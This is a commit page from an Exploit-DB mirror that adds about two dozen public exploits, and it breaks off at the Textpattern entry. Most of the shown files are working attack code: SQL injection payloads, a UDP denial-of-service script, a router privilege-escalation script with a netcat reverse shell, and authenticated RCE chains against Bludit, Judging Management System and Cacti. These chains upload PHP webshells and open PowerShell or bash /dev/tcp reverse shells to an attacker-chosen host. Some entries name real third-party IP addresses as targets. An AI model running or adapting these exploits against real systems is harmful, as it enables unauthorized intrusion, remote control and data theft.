bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2023-04-01

Browse source 
25 changes to exploits/shellcodes/ghdb

EQ Enterprise management system v2.2.0 - SQL Injection

qubes-mirage-firewall  v0.8.3 - Denial Of Service (DoS)

ASKEY RTF3505VW-N1 - Privilege Escalation

Bangresto 1.0 - SQL Injection

Bludit 3-14-1 Plugin 'UploadPlugin' - Remote Code Execution (RCE) (Authenticated)

Cacti v1.2.22 - Remote Command Execution (RCE)
Judging Management System v1.0 - Authentication Bypass
Judging Management System v1.0 - Remote Code Execution (RCE)

rconfig 3.9.7 - Sql Injection (Authenticated)

Senayan Library Management System v9.0.0 - SQL Injection

Spitfire CMS 1.0.475 - PHP Object Injection

Textpattern 4.8.8 - Remote Code Execution (RCE) (Authenticated)

WooCommerce v7.1.0 - Remote Code Execution(RCE)

CoolerMaster MasterPlus 1.8.5 - 'MPService' Unquoted Service Path
SOUND4 IMPACT/FIRST/PULSE/Eco v2.x  -  Denial Of Service (DoS)
SOUND4 IMPACT/FIRST/PULSE/Eco v2.x  - Authorization Bypass (IDOR)
SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authentication Bypass
SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Cross-Site Request Forgery
SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Directory Traversal File Write Exploit
SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Remote Command Execution (RCE)
SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Unauthenticated Factory Reset
SOUND4 Server Service 4.1.102 - Local Privilege Escalation

macOS/x64 - Execve Null-Free Shellcode
This commit is contained in:
Exploit-DB 2023-04-01 00:16:31 +00:00
parent 42ade901fe
commit 9b56e8731e
25 changed files with 1818 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

24
exploits/asp/webapps/51154.txt Normal file
View file

@ -0,0 +1,24 @@
Exploit Title: EQ Enterprise management system v2.2.0 - SQL Injection
Date: 2022.12.7
Exploit Author: TLF
Vendor Homepage: https://www.yiquantech.com/pc/about.html
Software Link(漏洞影响应用下载链接): http://121.8.146.131/,http://183.233.152.14:9000/,http://219.135.168.90:9527/,http://222.77.5.250:9000/,http://219.135.168.90:9530/
Version: EQ v1.5.31 to v2.2.0
Tested on: windows 10
CVE : CVE-2022-45297
POC:
POST /Account/Login HTTP/1.1
Host: 121.8.146.131
User-Agent:Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 118
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8 Cookie: ASP.NET_SessionId=tlipmh0zjgfdm5b4h1tgvolg
Origin: http://121.8.146.131
Referer: http://121.8.146.131/Account/Login
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
RememberPwd=false&ServerDB=EQ%27and%28select%2B1%29%3E0waitfor%2F%2A%2A%2Fdelay%270%3A0%3A0&UserNumber=%27&UserPwd=%27

24
exploits/hardware/dos/51157.py Executable file
View file

@ -0,0 +1,24 @@
# Exploit Title: qubes-mirage-firewall v0.8.3 - Denial Of Service (DoS)
# Date: 2022-12-04
# Exploit Author: Krzysztof Burghardt <krzysztof@burghardt.pl>
# Vendor Homepage: https://mirage.io/blog/MSA03
# Software Link: https://github.com/mirage/qubes-mirage-firewall/releases
# Version: >= 0.8.0 & < 0.8.4
# Tested on: Qubes OS
# CVE: CVE-2022-46770
#PoC exploit from https://github.com/mirage/qubes-mirage-firewall/issues/166
#!/usr/bin/env python3
from socket import socket, AF_INET, SOCK_DGRAM
TARGET = "239.255.255.250"
PORT = 5353
PAYLOAD = b'a' * 607
s = socket(AF_INET, SOCK_DGRAM)
s.sendto(PAYLOAD, (TARGET, PORT))

67
exploits/hardware/remote/51155.sh Executable file
View file

@ -0,0 +1,67 @@
# Exploit Title: ASKEY RTF3505VW-N1 - Privilege escalation
# Date: 07-12-2022
# Exploit Author: Leonardo Nicolas Servalli
# Vendor Homepage: www.askey.com
# Platform: ASKEY router devices RTF3505VW-N1
# Tested on: Firmware BR_SV_g000_R3505VMN1001_s32_7
# Vulnerability analysis: https://github.com/leoservalli/Privilege-escalation-ASKEY/blob/main/README.md
#Description:
#----------
# Mitrastar ASKEY RTF3505VW-N1 devices are provided with access through ssh into a restricted default shell (credentials are on the back of the router and in some cases this routers use default credentials).
# The command “tcpdump” is present in the restricted shell and do not handle correctly the -z flag, so it can be used to escalate privileges through the creation of a local file in the /tmp directory of the router, and injecting packets through port 80 used for the router's Web GUI) with the string ";/bin/bash" in order to be executed by "-z sh". By using “;/bin/bash” as injected string we can spawn a busybox/ash console.
#Exploit:
#--------
#!/usr/bin/bash
if [ -z "$@" ]; then
echo "Command example: $0 routerIP routerUser routerPassword remoteIPshell remotePortShell "
exit 0
fi
for K in $(seq 1 15) # Attemps
do
echo "**************************************************************************************"
echo "******************************** Attempt number $K ************************************"
echo "**************************************************************************************"
for l in $(seq 1 200) ; do echo ";/bin/bash" | nc -p 8888 $1 80 ; done > /dev/null 2>&1 & # start a background loop injecting the string ";/bin/bash" on the port 80 of the router
# Expect script for interact with the router through SSH, login, launch the tcpdump with the option "-z sh", and finally launch a more stable busybox reverse shell to our listener
/usr/bin/expect << EOD
spawn ssh $2@$1
expect {
"password: " {
send "$3\r"
expect ">"
send -- "tcpdump -v -ln -i any -w /tmp/runme$K -W 1 -G 1 -z sh src port 8888\r" # filter by source port 8888
}
"yes/no" {
send "yes\r"
#exp_continue
}
}
set timeout 2
expect {
timeout {
puts "Timeout..."
send "exit\r"
exit 0
}
"*usy*ox" {
expect "#"
send "rm /tmp/runme* \r"
send "rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f | /bin/sh -i 2>&1|nc $4 $5 >/tmp/f \r"
puts "Rooted !!!!!!!!!"
set timeout -1
expect "NEVER_APPEARING_STRING#" # wait an infinite time to mantain the rverse shell open
}
}
EOD
done

27
exploits/php/webapps/51156.txt Normal file
View file

@ -0,0 +1,27 @@
# Title: Wordpress Plugin WooCommerce v7.1.0 - Remote Code Execution(RCE)
# Date: 2022-12-07
# Author: Milad Karimi
# Vendor Homepage: https://wordpress.org/plugins/woocommerce
# Software Link: https://wordpress.org/plugins/woocommerce
# Tested on: windows 10 , firefox
# Version: 7.1.0
# CVE : N/A
# Description:
simple, easy to use jQuery frontend to php backend that pings various
devices and changes colors from green to red depending on if device is
up or down.
# PoC :
http://localhost/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php?product-type=;echo '<?php phpinfo(); ?>' >info.php
http://localhost/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php?product-type=;echo '<?php phpinfo(); ?>' >info.php
# Vulnerabile code:
 95: $classname $classname($post_id);
  94: $classname = WC_Product_Factory::get_product_classname($post_id, $product_type : 'simple');
    92:  function save($post_id, $post)
       93: $product_type = WC_Product_Factory::get_product_type($post_id) : sanitize_title(stripslashes($_POST['product-type']));
          92:  function save($post_id, $post)

139
exploits/php/webapps/51160.txt Normal file
View file

@ -0,0 +1,139 @@
# Exploit Title: Bludit 3-14-1 Plugin 'UploadPlugin' - Remote Code Execution (RCE) (Authenticated)
# Exploit Author: Alperen Ergel
# Contact: @alpernae (IG/TW)
# Software Homepage: https://www.bludit.com/
# Version : 3-14-1
# Tested on: windows 11 wampserver | Kali linux
# Category: WebApp
# Google Dork: intext:'2022 Powered by Bludit'
# Date: 8.12.2022
######## Description ########
#
# Step 1 : Archive as a zip your webshell (example: payload.zip)
# Step 2 : Login admin account and download 'UploadPlugin'
# Step 3 : Go to UploadPlugin section
# Step 4 : Upload your zip
# Step 5 : target/bl-plugins/[your_payload]
#
######## Proof of Concept ########
==============> START REQUEST <========================================
POST /admin/plugin/uploadplugin HTTP/2
Host: localhost
Cookie: BLUDIT-KEY=ri91q86hhp7mia1o8lrth63kc4
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------308003478615795926433430552264
Content-Length: 1820
Origin: https://036e-88-235-222-210.eu.ngrok.io
Dnt: 1
Referer: https://036e-88-235-222-210.eu.ngrok.io/admin/plugin/uploadplugin
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
-----------------------------308003478615795926433430552264
Content-Disposition: form-data; name="tokenCSRF"
b6487f985b68f2ac2c2d79b4428dda44696d6231
-----------------------------308003478615795926433430552264
Content-Disposition: form-data; name="pluginorthemes"
plugins
-----------------------------308003478615795926433430552264
Content-Disposition: form-data; name="zip_file"; filename="a.zip"
Content-Type: application/zip
PK †eˆU  a/PK  ”fˆUÆ ª)¢ Ä
a/a.phpíVێÓ0}ç+La BÛìVܖpX®ËJ @V꺭ƒíÒrûwl7É$mQyà‘<$©çÌÌ93ã¸È]ƒË·ï–óÒ=/. pÝãZ+M5/•¶BÎÈ0>©M†[jłÓB,„õtO̤Ҝ.
×4;’†e)¨ƒ¼Èה¯9[Z¡dðÆ „Œ&Âd<ó`÷+œN—’y¼Á
RLÉE¾(í7â}âø‡_‡¥æ3OºÈ'xð>A¯ p‚pânÁã¤ëÀ×e¡&œük£‹¼$Øj±ØFýâ…á@\@ªgxD¢Ì'áôæQ?½v£ŸöG7ñùZgéññõ“
j±u
\õ„±†à/ï¾Îޞ´×T™HÄZu™jœHkª‰È£û§gÑÅ,CÆêRâVjÅ5yùø%}q»ú­„Ä(ŽQK*Ë"Öï¡£;—Ò²·­6z²ZŸgXÊò¢ðíÄ'éûù+ñÌ%
µj,ÐäàN°ùf,_à8—“‹•˜lO€ScsmI«‡¬«H»¯*Sc?i”)i¹´&x@.'”<—¤Ûç]zs^a®·)‚hBz0;f rì‰þǸ0yÕU¥H"ÕÕÿI IØ\“t{có~€£ªä²Ë Ö÷š;dÁ³âÙlh†»s%Ç Ö8Nº+«}+Ž­ÿaºržŸŸžÂÂj.
îvWS²A¿O?nHO?›jžO ¤Ã£Q+ì¯æí^ Ï
e8©ô*Ô¾"ý¡@Ó2+ëÂ`÷
kC57j©"m
ã®ho¹ xŸô Û;’œcçzÙQ
Ë·[kô¿Ý¯-2ì~¨“æv©¥C€î‘Tþ#k2,UØSŽ¦€­OÁS£Øg˜‚úK †QˆÜ ØIϲòÖ`Ð:%F½$A"t;buOMr4Ýè~–eãΙåØXíÇm˜Ç(s 6A¸3,l>º…<N®¦q{s __~t6á¾,…ÅèçO´ÇÆ×Σv²±ãÿ‘Ú’‘Ug[;pq›eÓÜÅØÿéJ
Ë}êv‚3ð8´# ŠOµsÈO«ýbƒh±ï°Ÿd—Ë…¹ÿˆ>yþðMröâÁSzöæõÃûÏÜû)}óàeºqQRrf}êê_ D Ø0ìu’õv'§öø?@‡ êûOæh'˜Oœ8f—D¼5[à²=b~PK? †eˆU  $ €íA a/
  þš®,
Ù þš®,
Ù€ø¨j.
ÙPK?  ”fˆUÆ ª)¢ Ä
$ €¤ a/a.php
  ¤eÝ-
Ù ÷C-
Ù bj.
ÙPK   ­ ç
-----------------------------308003478615795926433430552264
Content-Disposition: form-data; name="submit"
Upload
-----------------------------308003478615795926433430552264--
==============> END REQUEST <========================================
## WEB SHELL UPLOADED!
==============> START RESPONSE <========================================
HTTP/2 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Thu, 08 Dec 2022 18:01:43 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Ngrok-Trace-Id: f3a92cc45b7ab0ae86e98157bb026ab4
Pragma: no-cache
Server: Apache/2.4.51 (Win64) PHP/7.4.26
X-Powered-By: Bludit
.
.
.
.
==============> END RESPONSE <========================================
# REQUEST THE WEB SHELL
==============> START REQUEST <========================================
GET /bl-plugins/a/a.php?cmd=whoami HTTP/2
Host: localhost
Cookie: BLUDIT-KEY=ri91q86hhp7mia1o8lrth63kc4
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
==============> END REQUEST <========================================
==============> START RESPONSE <========================================
HTTP/2 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 08 Dec 2022 18:13:14 GMT
Ngrok-Trace-Id: 30639fc66dcf46ebe29cc45cf1bf3919
Server: Apache/2.4.51 (Win64) PHP/7.4.26
X-Powered-By: PHP/7.4.26
Content-Length: 32
<pre>nt authority\system
</pre>
==============> END RESPONSE <========================================

62
exploits/php/webapps/51161.txt Normal file
View file

@ -0,0 +1,62 @@
## Exploit Title: Senayan Library Management System v9.0.0 - SQL Injection
## Author: nu11secur1ty
## Date: 11.09.2022
## Vendor: https://slims.web.id/web/
## Software: https://github.com/slims/slims9_bulian/releases/download/v9.0.0/slims9_bulian-9.0.0.zip
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0/SQLi
## Description:
The manual insertion `point 3` with `class` parameter appears to be
vulnerable to SQL injection attacks.
The payload '+(select
load_file('\\\\0absu0byc9uwy8ivftx7f6auul0fo5cwfk6at2hr.again.com\\fbe'))+'
was submitted in the manual insertion point 3.
This payload injects a SQL sub-query that calls MySQL's load_file
function with a UNC file path that references a URL on an external
domain.
The application interacted with that domain, indicating that the
injected SQL query was executed.
## STATUS: HIGH Vulnerability
[+] Payload:
```MySQL
---
Parameter: class (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY
or GROUP BY clause
Payload: reportView=true&year=2002&class=bbbb''' RLIKE (SELECT
(CASE WHEN (2547=2547) THEN 0x626262622727 ELSE 0x28 END)) AND
'dLjf'='dLjf&membershipType=a&collType=aaaa
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0/SQLi)
## Proof and Exploit:
[href](http://localhost:5001/sy5wji)
## Time spent
`03:00:00`
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

58
exploits/php/webapps/51162.txt Normal file
View file

@ -0,0 +1,58 @@
# Exploit Title: Spitfire CMS 1.0.475 - PHP Object Injection
# Exploit Author: LiquidWorm
Vendor: Claus Muus
Product web page: http://spitfire.clausmuus.de
Affected version: 1.0.475
Summary: Spitfire is a system to manage the content of webpages.
Desc: The application is prone to a PHP Object Injection vulnerability
due to the unsafe use of unserialize() function. A potential attacker,
authenticated, could exploit this vulnerability by sending specially
crafted requests to the web application containing malicious serialized
input.
-----------------------------------------------------------------------
cms/edit/tpl_backup.inc.php:
----------------------------
47: private function status ()
48: {
49: $status = array ();
50:
51: $status['values'] = array ();
52: $status['values'] = isset ($_COOKIE['cms_backup_values']) ? unserialize ($_COOKIE['cms_backup_values']) : array ();
...
...
77: public function save ($values)
78: {
79: $values = array_merge ($this->status['values'], $values);
80: setcookie ('cms_backup_values', serialize ($values), time()+60*60*24*30);
81: }
-----------------------------------------------------------------------
Tested on: nginx
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5720
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5720.php
28.09.2022
--
> curl -isk -XPOST http://10.0.0.2/cms/edit/tpl_backup_action.php \
-H 'Content-Type: application/x-www-form-urlencoded'
-H 'Accept: */*'
-H 'Referer: http://10.0.0.2/cms/edit/cont_index.php?tpl=backup'
-H 'Accept-Encoding: gzip, deflate'
-H 'Accept-Language: en-US,en;q=0.9'
-H 'Connection: close' \
-H 'Cookie: tip=0; cms_backup_values=O%3a3%3a%22ZSL%22%3a0%3a%7b%7d; cms_username=admin; PHPSESSID=0e63d3a8762f4bff95050d1146db8c1c' \
--data 'action=save&&value=1'
#--data 'action=save&&value[files]={}'

76
exploits/php/webapps/51163.py Executable file
View file

@ -0,0 +1,76 @@
# Exploit Title: rconfig 3.9.7 - Sql Injection (Authenticated)
# Exploit Author: azhen
# Date: 10/12/2022
# Vendor Homepage: https://www.rconfig.com/
# Software Link: https://www.rconfig.com/
# Vendor: rConfig
# Version: <= v3.9.7
# Tested against Server Host: Linux
# CVE: CVE-2022-45030
import requests
import sys
import urllib3
urllib3.disable_warnings()
s = requests.Session()
# sys.argv.append("192.168.10.150") #Enter the hostname
if len(sys.argv) != 2:
print("Usage: python3 rconfig_sqli_3.9.7.py <host>")
sys.exit(1)
host=sys.argv[1] #Enter the hostname
def get_data(host):
print("[+] Get db data...")
vul_url = "https://"+host+":443/lib/ajaxHandlers/ajaxCompareGetCmdDates.php?deviceId=-1&command='+union+select+concat(1000%2bord(substr({},{},1)),'-1-1')%20--%20"
query_exp = "database()"
result_data = ""
for i in range(1, 100):
burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate"}
res = requests.get(vul_url.format(query_exp, i), cookies=s.cookies,verify=False)
# print(res.text)
a = chr(int(res.text[6:10]) - 1000)
if a == '\x00':
break
result_data += a
print(result_data)
print("[+] Database name: {}".format(result_data))
'''
output:
[+] Logging in...
[+] Get db data...
r
rc
rco
rcon
rconf
rconfi
rconfig
rconfigd
rconfigdb
[+] Database name: rconfigdb
'''
def login(host):
print("[+] Logging in...")
url = "https://"+host+":443/lib/crud/userprocess.php"
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://demo.rconfig.com", "Connection": "close", "Referer": "https://demo.rconfig.com/login.php", "Upgrade-Insecure-Requests": "1"}
data = {"user": "admin", "pass": "admin", "sublogin": "1"} #Use valid set of credentials default is set to admin/admin
response=s.post(url, headers=headers, cookies=s.cookies, data=data, verify=False)
get_data(host)
login(host)

118
exploits/php/webapps/51164.py Executable file
View file

@ -0,0 +1,118 @@
# Exploit Title: Judging Management System v1.0 - Remote Code Execution (RCE)
# Date: 12/11/2022
# Exploit Author: Angelo Pio Amirante
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html
# Version: 1.0
# Tested on: Windows 10 on XAAMP server
import requests,argparse,re,time,base64
import urllib.parse
from colorama import (Fore as F,Back as B,Style as S)
from bs4 import BeautifulSoup
BANNER = """
Judging Management System v1.0 - Auth Bypass + Unrestricted File Upload = Remote Code Execution (RCE)
"""
def argsetup():
desc = S.BRIGHT + 'Judging Management System v1.0 - Remote Code Execution (RCE)'
parser = argparse.ArgumentParser(description=desc)
parser.add_argument('-t', '--target', help='Target URL, Ex: http://localhost/php-jms', required=True)
parser.add_argument('-l', '--listenip', help='Listening address required to receive reverse shell', required=True)
parser.add_argument('-lp','--listenport', help='Listening port required to receive reverse shell', required=True)
args = parser.parse_args()
return args
# Performs Auth bypass in order to get the admin cookie
def auth_bypass(args):
print(F.CYAN+"[+] Login into the application through Auth Bypass vulnerability...")
session = requests.Session()
loginUrl = f"{args.target}/login.php"
username = """' OR 1=1-- -"""
password = "randomvalue1234"
data = {'username': username, 'password': password}
login = session.post(loginUrl,verify=False,data=data)
admin_cookie = login.cookies['PHPSESSID']
print(F.GREEN+"[+] Admin cookies obtained !!!")
return admin_cookie
# Checks if the file has been uploaded to /uploads directory
def check_file(args,cookie):
uploads_endpoint = f"{args.target}/uploads/"
cookies = {'PHPSESSID': f'{cookie}'}
req = requests.get(uploads_endpoint,verify=False,cookies=cookies)
soup = BeautifulSoup(req.text,features='html.parser')
files = soup.find_all("a")
for i in range (len(files)):
match = re.search(".*-shelljudgesystem\.php",files[i].get('href'))
if match:
file = files[i].get('href')
print(F.CYAN+"[+] The webshell is at the following Url: "+f"{args.target}/uploads/"+file)
return file
return None
def file_upload(args,cookie):
now = int(time.time())
endpoint = f"{args.target}/edit_organizer.php"
cookies = {'wp-settings-time-1':f"{now}",'PHPSESSID': f'{cookie}'}
get_req = requests.get(endpoint,verify=False,cookies=cookies)
soup = BeautifulSoup(get_req.text,features='html.parser')
username = soup.find("input",{"name":"username"}).get('value')
admin_password = soup.find("input",{"id":"password"}).get('value')
print(F.GREEN + "[+] Admin username: " + username)
print(F.GREEN + "[+] Admin password: " + admin_password)
# Multi-part request
file_dict = {
'fname':(None,"Random"),
'mname':(None,"Random"),
'lname':(None,"Random"),
'email':(None,"ranom@mail.com"),
'pnum':(None,"014564343"),
'cname':(None,"Random"),
'caddress':(None,"Random"),
'ctelephone':(None,"928928392"),
'cemail':(None,"company@mail.com"),
'cwebsite':(None,"http://company.com"),
'file':("shelljudgesystem.php","<?php system($_REQUEST['cmd']) ?>","application/octet-stream"),
'username':(None,f"{admin_password}"),
'passwordx':(None,f"{admin_password}"),
'password2x':(None,f"{admin_password}"),
'password':(None,f"{admin_password}"),
'update':(None,"")
}
req = requests.post(endpoint,verify=False,cookies=cookies,files=file_dict)
def exploit(args,cookie,file):
payload = f"""powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient('{args.listenip}',{args.listenport})%3b"""+"""$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0){%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()" """
uploads_endpoint = f"{args.target}/uploads/{file}?cmd={payload}"
cookies = {'PHPSESSID': f'{cookie}'}
print(F.GREEN + "\n[+] Enjoy your reverse shell ")
requests.get(uploads_endpoint,verify=False,cookies=cookies)
if __name__ == '__main__':
print(F.CYAN + BANNER)
args = argsetup()
cookie=auth_bypass(args=args)
file_upload(args=args,cookie=cookie)
file_name=check_file(args=args,cookie=cookie)
if file_name is not None:
exploit(args=args,cookie=cookie,file=file_name)
else:
print(F.RED + "[!] File not found")

36
exploits/php/webapps/51165.txt Normal file
View file

@ -0,0 +1,36 @@
# Exploit Title: Judging Management System v1.0 - Authentication Bypass
# Date: 12/11/2022
# Exploit Author: Angelo Pio Amirante
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html
# Version: 1.0
# Tested on: Windows 10 on XAAMP server
# Vulnerability: An attacker can bypass login page and access to dashboard page
# Vulnerable file: login.php
# Exploit:
1) Go to: http://localhost/php-jms/index.php
2) As username use this payload: 'or 1=1-- -
3) Use random words for password
POST /php-jms/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
Origin: http://localhost
Connection: close
Referer: http://localhost/php-jms/index.php
Cookie: wp-settings-time-1=1669938282; _pk_id.1.1fff=9c7644c9d84f46f1.1670232782.
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
username=%27or+1%3D1--+-&password=asa

69
exploits/php/webapps/51166.py Executable file
View file

@ -0,0 +1,69 @@
# Exploit Title: Cacti v1.2.22 - Remote Command Execution (RCE)
# Exploit Author: Riadh BOUCHAHOUA
# Discovery Date: 2022-12-08
# Vendor Homepage: https://www.cacti.net/
# Software Links : https://github.com/Cacti/cacti
# Tested Version: 1.2.2x <= 1.2.22
# CVE: CVE-2022-46169
# Tested on OS: Debian 10/11
#!/usr/bin/env python3
import random
import httpx, urllib
class Exploit:
def __init__(self, url, proxy=None, rs_host="",rs_port=""):
self.url = url
self.session = httpx.Client(headers={"User-Agent": self.random_user_agent()},verify=False,proxies=proxy)
self.rs_host = rs_host
self.rs_port = rs_port
def exploit(self):
# cacti local ip from the url for the X-Forwarded-For header
local_cacti_ip = self.url.split("//")[1].split("/")[0]
headers = {
'X-Forwarded-For': f'{local_cacti_ip}'
}
revshell = f"bash -c 'exec bash -i &>/dev/tcp/{self.rs_host}/{self.rs_port} <&1'"
import base64
b64_revshell = base64.b64encode(revshell.encode()).decode()
payload = f";echo {b64_revshell} | base64 -d | bash -"
payload = urllib.parse.quote(payload)
urls = []
# Adjust the range to fit your needs ( wider the range, longer the script will take to run the more success you will have achieving a reverse shell)
for host_id in range(1,100):
for local_data_ids in range(1,100):
urls.append(f"{self.url}/remote_agent.php?action=polldata&local_data_ids[]={local_data_ids}&host_id={host_id}&poller_id=1{payload}")
for url in urls:
r = self.session.get(url,headers=headers)
print(f"{r.status_code} - {r.text}" )
pass
def random_user_agent(self):
ua_list = [
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0",
]
return random.choice(ua_list)
def parse_args():
import argparse
argparser = argparse.ArgumentParser()
argparser.add_argument("-u", "--url", help="Target URL (e.g. http://192.168.1.100/cacti)")
argparser.add_argument("-p", "--remote_port", help="reverse shell port to connect to", required=True)
argparser.add_argument("-i", "--remote_ip", help="reverse shell IP to connect to", required=True)
return argparser.parse_args()
def main() -> None:
# Open a nc listener (rs_host+rs_port) and run the script against a CACTI server with its LOCAL IP URL
args = parse_args()
e = Exploit(args.url, rs_host=args.remote_ip, rs_port=args.remote_port)
e.exploit()
if __name__ == "__main__":
main()

56
exploits/php/webapps/51175.txt Normal file
View file

@ -0,0 +1,56 @@
## Exploit Title: Bangresto 1.0 - SQL Injection
## Exploit Author: nu11secur1ty
## Date: 12.16.2022
## Vendor: https://axcora.com/, https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html
## Demo: https://axcora.my.id/bangrestoapp/start.php
## Software: https://github.com/mesinkasir/bangresto
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Bangresto
## Description:
The `itemID` parameter appears to be vulnerable to SQL injection attacks.
The payload ' was submitted in the itemID parameter, and a database
error message was returned.
The attacker can be stooling all information from the database of this
application.
## STATUS: CRITICAL Vulnerability
[+] Payload:
```MySQL
---
Parameter: itemID (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
Payload: itemID=(UPDATEXML(2539,CONCAT(0x2e,0x7171767871,(SELECT
(ELT(2539=2539,1))),0x7170706a71),2327))&menuID=1
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Bangresto)
## Proof and Exploit:
[href](https://streamable.com/moapnd)
## Time spent
`00:30:00`
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

132
exploits/php/webapps/51176.txt Normal file
View file

@ -0,0 +1,132 @@
# Exploit Title: Textpattern 4.8.8 - Remote Code Execution (RCE) (Authenticated)
# Exploit Author: Alperen Ergel
# Contact: @alpernae (IG/TW)
# Software Homepage: https://textpattern.com/
